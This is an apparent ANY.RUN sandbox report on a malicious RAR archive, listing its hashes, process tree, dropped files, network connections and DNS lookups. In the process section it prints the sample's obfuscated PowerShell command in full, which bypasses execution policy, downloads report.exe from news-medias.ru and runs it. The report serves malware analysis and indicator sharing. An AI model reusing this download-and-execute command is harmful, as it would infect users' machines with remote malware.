analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

doc.rar

Full analysis: https://app.any.run/tasks/ef1026e2-7926-49ab-90b4-7fa8cef9def1
Verdict: Malicious activity
Analysis date: April 23, 2019, 11:30:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, flags: EncryptedBlockHeader
MD5:

C54C3F4C84926B3B56E9DD22160EAE41

SHA1:

5B80C0B223475910AC2CF750E4F3D87C4693295A

SHA256:

F113CFD9244C708C13B2EEDC8074D566BF4542E8319F6CEBC26FF7D069DF956F

SSDEEP:

192:4DNegjLLDLnfODgDVafTjf+k+88aYT4TTx7Sexq64A9wvZG1XBo+p+drI5Iv+sTB:tgf3DiiUfTVJlYTmx7Hj95elrI5sTB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 4036)
      • cmd.exe (PID: 1932)
  • SUSPICIOUS

    • Modifies files in Chrome extension folder

      • chrome.exe (PID: 3460)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 4068)
      • WScript.exe (PID: 588)
    • Creates files in the user directory

      • powershell.exe (PID: 2792)
      • powershell.exe (PID: 2960)
  • INFO

    • Reads settings of System Certificates

      • chrome.exe (PID: 3460)
    • Application launched itself

      • chrome.exe (PID: 3460)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v-4.x) (58.3)
.rar | RAR compressed archive (gen) (41.6)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
58
Monitored processes
25
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
4084"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\doc.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
588"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\2.js" C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
4036"C:\Windows\System32\cmd.exe" /c KwZjlLbNGiBSdxn & p^owEr^she^lL.e^Xe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://news-medias.ru/report.exe','%temp%hPF56.exe'); & start %temp%hPF56.exe & pguGFVTMdBEiAekC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2792powErshelL.eXe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://news-medias.ru/report.exe','C:\Users\admin\AppData\Local\TemphPF56.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3460"C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
3221225547
Version:
73.0.3683.75
3908"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=73.0.3683.75 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x6f3c0f18,0x6f3c0f28,0x6f3c0f34C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
1128"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1440 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
560"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=960,10090080216740779934,10348648940248137569,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwAAAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=3296215834612289282 --mojo-platform-channel-handle=952 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
3836"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=960,10090080216740779934,10348648940248137569,131072 --enable-features=PasswordImport --service-pipe-token=7048751166362225751 --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=7048751166362225751 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1952 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
1956"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=960,10090080216740779934,10348648940248137569,131072 --enable-features=PasswordImport --service-pipe-token=16587134835834059526 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=16587134835834059526 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2192 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
Total events
1 234
Read events
1 000
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
67
Text files
145
Unknown types
10

Dropped files

PID
Process
Filename
Type
2792powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KS2936T8CGCDBL5PMYGE.temp
MD5:
SHA256:
3460chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
MD5:
SHA256:
3460chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
MD5:
SHA256:
3460chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
MD5:
SHA256:
3460chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
MD5:
SHA256:
3460chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
MD5:
SHA256:
3460chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old
MD5:
SHA256:
3460chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\1dbfaf8e-939b-488e-88f7-0fd40db4016e.tmp
MD5:
SHA256:
3460chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000018.dbtmp
MD5:
SHA256:
3460chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2792
powershell.exe
GET
200.91.115.40:80
http://news-medias.ru/report.exe
CR
malicious
2792
powershell.exe
GET
200.91.115.40:80
http://news-medias.ru/report.exe
CR
malicious
2960
powershell.exe
GET
200.91.115.40:80
http://news-medias.ru/report.exe
CR
malicious
2960
powershell.exe
GET
200.91.115.40:80
http://news-medias.ru/report.exe
CR
malicious
3460
chrome.exe
GET
200
173.194.139.6:80
http://r1---sn-aigzrn7k.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvMjJlQUFXRC12Ny1ldUFnMXF3SDlXZDlFZw/7319.128.0.1_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx?cms_redirect=yes&mip=185.230.125.140&mm=28&mn=sn-aigzrn7k&ms=nvh&mt=1556018957&mv=m&pl=24&shardbypass=yes
US
crx
842 Kb
whitelisted
3460
chrome.exe
GET
302
172.217.18.14:80
http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvMjJlQUFXRC12Ny1ldUFnMXF3SDlXZDlFZw/7319.128.0.1_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx
US
html
506 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3460
chrome.exe
172.217.16.142:443
clients1.google.com
Google Inc.
US
whitelisted
3460
chrome.exe
216.58.206.3:443
ssl.gstatic.com
Google Inc.
US
whitelisted
3460
chrome.exe
172.217.16.141:443
accounts.google.com
Google Inc.
US
suspicious
3460
chrome.exe
172.217.21.195:443
www.google.com.ua
Google Inc.
US
whitelisted
3460
chrome.exe
172.217.18.14:80
redirector.gvt1.com
Google Inc.
US
whitelisted
3460
chrome.exe
172.217.22.14:443
apis.google.com
Google Inc.
US
whitelisted
3460
chrome.exe
172.217.16.131:443
www.gstatic.com
Google Inc.
US
whitelisted
3460
chrome.exe
216.58.208.46:443
clients2.google.com
Google Inc.
US
whitelisted
3460
chrome.exe
173.194.139.6:80
r1---sn-aigzrn7k.gvt1.com
Google Inc.
US
whitelisted
2792
powershell.exe
200.91.115.40:80
news-medias.ru
Instituto Costarricense de Electricidad y Telecom.
CR
suspicious

DNS requests

Domain
IP
Reputation
news-medias.ru
  • 200.91.115.40
  • 130.204.181.90
  • 178.169.222.191
  • 197.157.216.75
  • 195.222.40.54
  • 151.251.23.210
  • 109.102.5.159
  • 109.120.214.195
  • 193.33.1.18
  • 86.106.200.105
malicious
clientservices.googleapis.com
  • 216.58.207.67
whitelisted
www.google.com.ua
  • 172.217.21.195
whitelisted
accounts.google.com
  • 172.217.16.141
shared
clients1.google.com
  • 172.217.16.142
whitelisted
ssl.gstatic.com
  • 216.58.206.3
whitelisted
www.gstatic.com
  • 172.217.16.131
whitelisted
apis.google.com
  • 172.217.22.14
whitelisted
clients2.google.com
  • 216.58.208.46
whitelisted
redirector.gvt1.com
  • 172.217.18.14
whitelisted

Threats

No threats detected
No debug info